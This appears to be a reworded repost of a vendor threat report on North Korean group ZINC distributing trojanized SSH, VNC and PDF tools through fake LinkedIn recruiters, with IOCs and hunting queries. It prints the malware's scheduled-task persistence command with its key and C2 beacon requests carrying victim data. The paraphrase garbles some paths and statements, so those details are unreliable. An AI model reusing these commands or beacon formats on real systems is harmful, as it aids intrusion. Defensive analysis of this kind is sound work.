Microsoft has recently discovered a variety of social engineering activities by an actor we trace as ZINC that weaponized legal open-source software. In the US, UK, India, and Russia, the Microsoft Threat Intelligence Center (MSTIC) has detected activities aimed against employees of businesses in a variety of industries, including media, defense and aerospace, and IT services. ZINC, a state-sponsored organization based in North Korea with goals centered on espionage, data theft, financial gain, and network devastation, is the group MSTIC most confidently links this campaign to based on the observed tradecraft, infrastructure, tooling, and account affiliations.
Starting in June 2022, ZINC used conventional social engineering techniques by initially establishing connections with people on LinkedIn to build trust with their targets. After establishing a link, ZINC urged users to keep in touch using WhatsApp, which served as the vehicle for spreading their malicious payloads.
MSTIC saw ZINC using a variety of open-source programs, such as the installers for muPDF/Subliminal Recording, Sumatra PDF Reader, KiTTY, TightVNC, PuTTY, and KiTTY, to carry out these assaults. ZINC was seen making an effort to migrate laterally and exfiltrate data from target networks. Since June 2022, the actors have successfully compromised some organizations. Mandiant also reported on the ongoing campaign with the weaponized PuTTY earlier last month. ZINC might represent a serious threat to people and organizations across all industries and countries because of the widespread use of the platforms and software it uses in its campaign.
Comprehensive defense against ZINC-specific tools and malware is offered by Microsoft Defender for Endpoint, including ZetaNile. Customers will be able to thoroughly search their environments for pertinent signs with the help of the hunting questions provided at the end of this article. Microsoft directly informs customers who have been targeted or hacked, giving them the information they need to secure their accounts, just like with any observed nation-state actor action.
Who is ZINC?
ZINC is a nation-state activity organization that is highly operational, destructive, and sophisticated. The action group, which has been active since 2009, increased its level of public awareness in 2014 as a result of its successful attack on Sony Pictures Entertainment. Microsoft has identified FoggyBrass and PhantomStar as two of the customized remote access tools (RATs) used by ZINC in their inventory.
ZINC actors have been seen to mostly use spear-phishing, according to Microsoft researchers, but they have also been seen to use social engineering on social networking platforms and targeted website compromises to further their goals. ZINC targets employees of the companies it is trying to infiltrate and attempts to persuade them to open weaponized documents that include dangerous macros or install seemingly innocent apps. Security researchers have also been the targets of targeted attacks on Twitter and LinkedIn.
ZINC assaults seem to be driven by conventional cyberespionage, data theft from individuals and businesses, monetary gain, and corporate network devastation. Increased operational security, sophisticated malware that changes over time, and politically motivated targeting are just a few of the characteristics that ZINC attacks share with state-sponsored activities.
From late April through mid-September 2022, ZINC, also known as Labyrinth Chollima and Black Artemis, was seen carrying out this campaign.
Figure 1. Attack flow diagram for the recent ZINC campaign
Observed actor activity
Impersonation and establishing contact
ZINC was discovered by LinkedIn Threat Prevention and Defense making fake accounts pretending to be recruiters for tech, defense, and media entertainment businesses to divert targets away from LinkedIn and into the secure messaging platform WhatsApp for the distribution of malware. Engineers and technical support staff employed by media and IT businesses with locations in the US, UK, and India were the main targets of ZINC. Targets got outreach that was specific to their industry or educational background and were urged to apply for a position at one of several reputable businesses. LinkedIn quickly canceled any accounts connected to fraudulent or dishonest behavior for accounts uncovered in these assaults in compliance with its policy.
Figure 2. Fraudulent recruiter profile
Multiple methods used for delivery of ZetaNile
The ZetaNile virus family has been identified as the source of at least five techniques of malware open-source apps that contain harmful payloads and shellcode. The ZetaNile implants, also referred to as BLINDINGCAN, have been discussed in reports from CISA and JPCERT. The implant DLLs of the ZetaNile malware family are either encrypted with unique algorithms or loaded with commercial software protectors like Themida and VMProtect.
Figure 3 illustrates how the malicious DLL’s payload is decrypted using a special key that is given during the DLL search order hijacking of the genuine Windows process. The ZetaNile implants send command and control (C2) HTTP requests to known exploited C2 domains using special proprietary encryption techniques or AES encryption. These C2 communications can blend in with normal traffic by encoding the victim information in the parameters for popular keywords like game type or bbs in the HTTP POSTs.
The weaponization of SSH clients
ZINC operationalized malicious versions of the SSH clients PuTTY and KiTTY, which served as the entry point for the ZetaNile implant, after connecting to their target. Both applications offer terminal emulator support for many networking protocols, which attracts users who are usually the targets of ZINC. The weaponized versions were usually sent as ISO or ZIP compressed archives. The recipient will find a ReadMe.txt file and an executable program inside that archive. Running the bundled executable does not remove the ZetaNile implant as part of the advancement of ZINC’s malware development and an effort to bypass conventional defenses. The IP specified in the ReadMe.txt file is required by the SSH software for ZetaNile to be deployed. Below is a sample of what that file might contain:
Server: 137[.]184[.]15[.]189 User: [redacted] Pass: [redacted]
Weaponized PuTTY malware
For many years, ZINC has used malware PuTTY as a component of its attack chain. The most current iteration creates persistence on infected devices by making use of scheduled activities. Mandiant recently alerted them to this activity. The malicious PUTTY.exe is set up to copy C:WindowsSystem32colorcpl.exe to C:ProgramDatacolorcpl.exe after installing the Event Horizon virus in C:ProgramDatacolorui.dll. ZINC can load the second stage malware colurui.dll and decode the payload with the key “0CE1241A44557AA438F27BC6D4ACA246” to be utilized for command and control by exploiting DLL search order hijacking. Once connected to the C2 server, the attackers can use the compromised device to install other malware for different purposes.
As part of the configuration for the weaponized PuTTY, a daily scheduled task called PackageColor is created, establishing persistence. ZINC achieves this with the command shown below:
Figure 3. PuTTY – scheduled task as part of persistence
Weaponized KiTTY malware
ZINC has long used a weaponized version of PuTTY, but they have just lately expanded their weapons to include weaponizing KiTTY, a fork of PuTTY. The application gathers the target system’s username and hostname before sending them via TCP/22 to a hardcoded IP address, 172[.]93[.]201[.]253. The malicious KiTTY program decodes numerous times before establishing a successful TCP connection to the server at 137[.]184[.]15[.]189, after which it deploys the malware as %AppData%mscoree.dll. The ZetaNile malware family’s embedded payload, identified as EventHorizon, is the mscoree.dll file. Similar to ZINC’s PuTTY, the actor loads malicious DLL files that operate in the context of these legitimate Windows processes using DLL search order hijacking, notably through %AppData%KiTTY%PresentationHost.exe -EmbeddingObject.
Figure 4. KiTTY – DLL search order hijacking
The mscoree.dll malware is modularized so that, after connecting successfully to the compromised C2 domain, the attackers can add new malware to the target system as necessary by using the C2 communication that is already in place. For example, the attackers could run C:ProgramDataCiscofixmapi.exe -s AudioEndpointBuilder to load malicious mapistub.dll from the C2 server. A unique ID for the field game type and a hardcoded value for the field type are included in the HTTP POST requests, which are used to track malware campaign activity. These features are described below:
POST /wp-includes/php-compat/compat.php HTTP/1.1 Accept: text/* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39 Content-Type: application/x-www-form-urlencoded Content-Length: 39 Host: olidhealth[.]com Connection: Keep-Alive Cache-Control: no-cache gametype=[UniqueId]&type=O8Akm8aV09Nw412KoWJds
Weaponized TightVNC Viewer
ZINC was discovered using a trojanized TightVNC Viewer that was sent to a target together with a weaponized SSH tool over WhatsApp starting in September 2022. The PDBPath for this malware is special:
The weaponized versions of TightVNC Viewer were frequently distributed via online services like WhatsApp as compressed ZIP archives or job description-themed ISO files. The recipient will find a ReadMe.txt file and an executable program inside that archive. The following is in the text file (.txt):
Platform: 2nd from the list User: [redacted] Pass: [redacted]
The malicious TightVNC Viewer has a pre-populated list of remote hosts as part of the threat actor’s most recent malware technique to get past traditional defenses, and it is set up to only install the backdoor when the user chooses ec2-aet-tech.w-ada[.]amazonaws from the drop-down menu, as shown in Figure 5:
Figure 5. Weaponized TightVNC Viewer – user interface
The malware was set up to establish VNC sessions to the same IP on port TCP/5900 and submit the victim’s username and hostname to IP 44[.]238[.]74[.]84 as part of the victim’s check-in with the C2. The integrated second stage DLL payload from TightVNC.exe is loaded in memory once a successful connection to the server IP has been made in order to start C2 communication to a known compromised domain.
The weaponization of Sumatra PDF reader and muPDF/Subliminal Recording installer
Sumatra PDF and muPDF/Subliminal Recording installation are two malicious versions of PDF readers that ZINC has operationalized and which serve as the entry point for the ZetaNile implant. This method of delivery is commonly used in connection with fake job advertising sent to targets looking for employment in the IT and defense industries. The weaponized versions were usually sent in ZIP archives that had been compressed. The recipient will find an executable file inside that archive. The muPDF/Subliminal Recording installer can set up the backdoor without loading any malicious PDF files, in contrast to the malicious Sumatra PDF reader, which is a fully working PDF reader and can load the malicious implant from a false PDF.
Trojanized Sumatra PDF Reader
ZINC has been using SecurePDF.exe, a trojanized version of Sumatra PDF Reader, since at least 2019 and it continues to be special ZINC tradecraft. By loading a weaponized job application-themed PDF file, SecurePDF.exe, a modularized loader, can install the ZetaNile implant. When opened in the Sumatra PDF Reader, the fake PDF is rendered with the header “SPV005”, a decryption key, an encrypted second stage implant payload, and an encrypted decoy PDF.
The victim’s system hostname and device information are sent to a C2 communication server using unique encoding techniques once the second stage malware has been loaded in memory as part of the C2 check-in procedure. Using a C2 connection, the attackers can add more malware as needed to the hacked devices.
Figure 6. SecurePDF interface
Trojanized muPDF/Subliminal Recording installer
Setup.exe is programmed to check for the existence of the file path ISSetupPrerequisitesSetup64.exe and write C:colrctlcolorui.dll to disk after extracting the embedded executable inside setup.exe in the malware version of the muPDF/Subliminal Recording installation. Then it moves ColorCpl.exe from C: WindowsSystem32 to ColorCtrl. The malicious installation generates a new process named C:colorctrlcolorcpl.exe with the input C3A9B30B6A313F289297C9A36730DB6D, which is then supplied to colorui.dll as a decryption key for the second stage of the infection. When a victim checks in, the DLL colorui.dll, which Microsoft is tracking as part of the EventHorizon malware family, is injected into credwiz.exe or iexpress.exe to perform C2 HTTP requests and obtain additional malware.
POST /support/support.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
bbs=[encrypted payload]= &article=[encrypted payload]
Microsoft will keep an eye on ZINC activity and put protections in place for our users. Below is a list of the detections and IOCs that are currently active across all of our security solutions.
Recommended customer actions
The following security considerations can be employed to mitigate the methods the actor used and are stated in the “Observed actor activity” section:
- Investigate whether they exist in your environment and make an assessment of any potential breaches using the indicators of compromise that are presented.
- Block incoming traffic from the IPs listed in the table “Indicators of Compromise.”
- To ensure validity and look into any unusual activity, review all authentication activity for the remote access infrastructure, paying special attention to accounts set up using single-factor authentication.
- To reduce the risk of credentials being stolen, enable multifactor authentication (MFA) and make sure that it is enforced for any remote connectivity. NOTE: To secure your accounts, Microsoft highly advises all customers to download and use password-less solutions like Microsoft Authenticator.
- Inform end users about how to avoid getting infected with malware, including how to ignore or delete unusual and unwanted emails that contain ISO attachments. Encourage end users to exercise excellent credential hygiene; restrict access to accounts with local or domain admin rights and enable Microsoft Defender Firewall to stop malware from spreading and being infected.
- End users should receive instructions on how to secure their private and professional information on social media, filter unwelcome mail, spot spear-phishing emails, and watering holes, and report any unusual behavior or recon attempts.
Indicators of compromise (IOCs)
The list of IOCs found during our investigation is shown below. We advise our customers to look into these indicators in their settings and put detections and protections in place to identify previous relevant activity and stop future attacks on their systems.
|C:\ProgramData\Comms\colorui.dll||File path||Malicious PuTTY implant|
|%APPDATA%\KiTTY\mscoree.dll||File path||Malicious KiTTY implant|
|172.93.201[.]253||IP address||Adversary C2 server|
|137.184.15[.]189||IP address||Adversary SSH server|
|44.238.74[.]84||IP address||Hard-coded VNC Server IP for malicious TightVNC|
|c:\windows\system32\schtasks.exe /CREATE /SC DAILY /MO 1 /ST 10:30 /TR “C:\Windows\System32\cmd.exe /c start /b C:\ProgramData\PackageColor\colorcpl.exe 0CE1241A44557AA438F27BC6D4ACA246” /TN PackageColor /F||Scheduled task name||Putty.exe – Scheduled task|
|e1ecf0f7bd90553baaa83dcdc177e1d2b20d6ee5520f5d9b44cdf59389432b10||SHA-256||Malicious KiTTY implant for mscoree.dll|
|c5a470cdf6f57125a8671f6b8843149cc78ccbc1a7bc615f34b23d9f241312bf||SHA-256||Weaponized Sumatra PDFReader.exe|
|71beb4252e93291c7b14dfcb4cbb5d58144a76181fbe4aab3592121a3dbd9c55||SHA-256||Weaponized muPDF/Subliminal Recording installer|
|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39||User agent||Hardcoded Kitty.exe UA|
|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)||User agent||Hardcoded SecurePDF.exe UA|
|N:\2.MyDevelopment\3.Tools_Development\4.TightVNCCustomize\Munna_Customize\tightvnc\x64\\Release\tvnviewer.pdb||PDBPath||PDBPath for malicious TightVNC|
NOTE: These signs should not be viewed as being all-inclusive for the activity being monitored.
Microsoft Defender Antivirus
Customers of Microsoft Defender Antivirus and Microsoft Defender for Endpoints should pay attention to behavior associated with these attacks under the following family names:
Microsoft Defender for Endpoint
The activities linked to this threat may be indicated by the following Microsoft Defender for Endpoint alerts. However, these alerts might also be set off by unrelated threat activities.
- Suspicious Task Scheduler activity
- Suspicious connection to remote service
- A suspicious file was observed
- An executable loaded an unexpected dll
- Possible theft of remote session credentials
- Suspicious connection to remote service
Microsoft 365 Defender
Customers of Microsoft 365 Defender can use the following advanced hunting queries to find connected activity:
- Suspicious mapistub.dll file creation
Look for PresentationHost.exe when it creates mapistub.dll since it will likely be used in attacks that hijack DLL search order.
DeviceFileEvents | where InitiatingProcessFileName =~ "presentationhost.exe" | where FileName =~ "mapistub.dll"
- Suspicious mscoree.dll file creation
Analyze any mscoree.dll instances PuTTY processes have produced.
DeviceFileEvents | where InitiatingProcessFileName hassuffix "kitty.exe" or InitiatingProcessVersionInfoInternalFileName has "PuTTY" | where FileName =~ "mscoree.dll"
- Suspicious colorcpl.exe image load
Surface instances of a DLL search order hijacking attack include the colorcpl.exe process loading colorui.dll in a path other than the one expected.
DeviceImageLoadEvents | where InitiatingProcessFileName =~ "colorcpl.exe" | where FileName =~ "colorui.dll" and not(FolderPath has_any("system32", "syswow64", "program files"))
Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.
For more information, please get in touch with one of our course advisers today or contact us at email@example.com